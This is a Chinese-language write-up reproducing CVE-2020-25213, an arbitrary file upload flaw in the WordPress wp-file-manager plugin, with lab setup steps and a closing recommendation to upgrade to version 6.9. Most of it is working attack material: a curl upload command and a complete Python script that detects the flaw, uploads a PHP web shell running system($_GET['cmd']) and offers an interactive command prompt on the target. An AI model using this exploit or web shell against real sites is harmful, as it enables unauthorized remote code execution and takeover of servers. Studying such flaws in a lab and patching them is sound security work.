0x01 漏洞概述
WordPress是一套使用PHP语言开发的博客平台,该平台支持在PHP和MySQL的服务器上架设个人博客网站。而WordPress的文件管理器插件(wp-file-manager)6.9版本之前存在安全漏洞,该漏洞允许远程攻击者上传和执行任意PHP代码。
0x02 影响版本
WordPress 文件管理器(wp-file-manager)插件 6.0-6.8 版本
0x03 环境搭建
- phpstudy2018
- WordPress
https://wordpress.org/download/
- wp-file-manager 6.0版本
https://wordpress.org/plugins/wp-file-manager/advanced/
①将WordPress启动安装程序
- 安装教程参考链接:
https://codex.wordpress.org/zh-cn:%E5%AE%89%E8%A3%85_WordPress(可能需使用魔法访问)
或者推荐百度查找,这里不多赘述。
- 搭建成功后的WordPress首页
- 进入管理员后台安装wp-file-manager 6.0插件
http://YourIP/wordpress/wp-admin/plugin-install.php
将插件安装完如下:
http://YourIP/wordpress/wp-admin/plugins.php
0x04 漏洞复现
- 浏览器访问
http://YourIP/wordpress/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php
出现下面到的errUnknowCmd说明漏洞存在
- 使用curl命令将本地文件用POST方法上传
curl -F cmd=upload -F target=l1_ -F upload[]=@test.php -XPOST "http://YourIP/wordpress/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php"
test.php文件内容:
- 访问上传的文件查看
上传路径:
http://YourIP/wordpress/wp-content/plugins/wp-file-manager/lib/files/test.php
0x05 漏洞POC&EXP
# -*- coding:utf-8 -*-
import json
import requests
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) "
"Chrome/91.0.4472.124 Safari/537.36 "
}
url_tail = "/wordpress/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php"
upfiles_path = "/wordpress/wp-content/plugins/wp-file-manager/lib/files"
payload = "?cmd="
"""
漏洞验证_1
检测响应中是否有errUnknownCmd
"""
def Check_1(url):
url_2 = url + url_tail
res1 = requests.get(url=url_2, headers=headers)
text1 = res1.text
text2 = json.loads(text1)
key = json.dumps(text2) # 将json转换为字符串
print(text2)
key1 = "errUnknownCmd"
if key1 in key:
print("疑似漏洞存在")
Next = input("是否进一步验证 Y or N :")
if Next == "Y":
Check_2(url)
else:
print("漏洞不存在")
"""
漏洞验证_2
访问上传的php文件是否有正确响应
这里上传的php文件内容:<?php phpinfo() ?>
"""
def Check_2(url):
data = {
'cmd': 'upload',
'target': 'l1_',
}
files = {
'upload[0]': open('phpinfo.php', 'rb'),
}
url_3 = url + url_tail
res = requests.post(url=url_3, headers=headers, data=data, files=files, verify=False)
if res.status_code == requests.codes.ok:
# print("上传成功!")
d = res.json()
p = d.get('added', [])[0].get('url')
Finally_url = f'{url}{p}'
res2 = requests.get(url=Finally_url, headers=headers)
key2 = "PHP Version"
if key2 in res2.text:
print("CVE-2020-25213漏洞存在! ")
flag = input("是否进行漏洞利用 Y or N :")
if flag == "Y":
while 1:
command = input("输入执行的命令: ")
if command == "exit":
break
exploit(url, command)
else:
print("漏洞不存在!")
"""
漏洞利用
上传php文件并调用命令执行
exploit.php内容:<?php system($_GET['cmd']); ?>
"""
def exploit(url, command):
data = {
'cmd': 'upload',
'target': 'l1_',
}
files = {
'upload[0]': open('exploit.php', 'rb'),
}
url_2 = url + url_tail
file_status = url + upfiles_path + "/exploit.php"
res = requests.get(url=file_status, headers=headers, verify=False)
if res.status_code == requests.codes.ok:
Fin_url = file_status + payload + command
res3 = requests.get(url=Fin_url, headers=headers)
res3.encoding = 'gbk'
print(res3.text)
else:
res2 = requests.post(url=url_2, headers=headers, data=data, files=files, verify=False)
if res2.status_code == requests.codes.ok:
# print("上传成功!")
d = res2.json()
p = d.get('added', [])[0].get('url')
url_3 = f'{url}{p}'
Fin_url = url_3 + payload + command
res2 = requests.get(url=Fin_url, headers=headers)
res2.encoding = 'gbk'
print(res2.text)
def main():
url = input("输入测试的URL:")
Check_1(url)
if __name__ == '__main__':
main()
刚开始学习写POC与EXP,有哪里有问题的欢迎大佬们指出_(:з」∠)_
0x06 修复建议
更新wp-file-manager插件至6.9或更高版本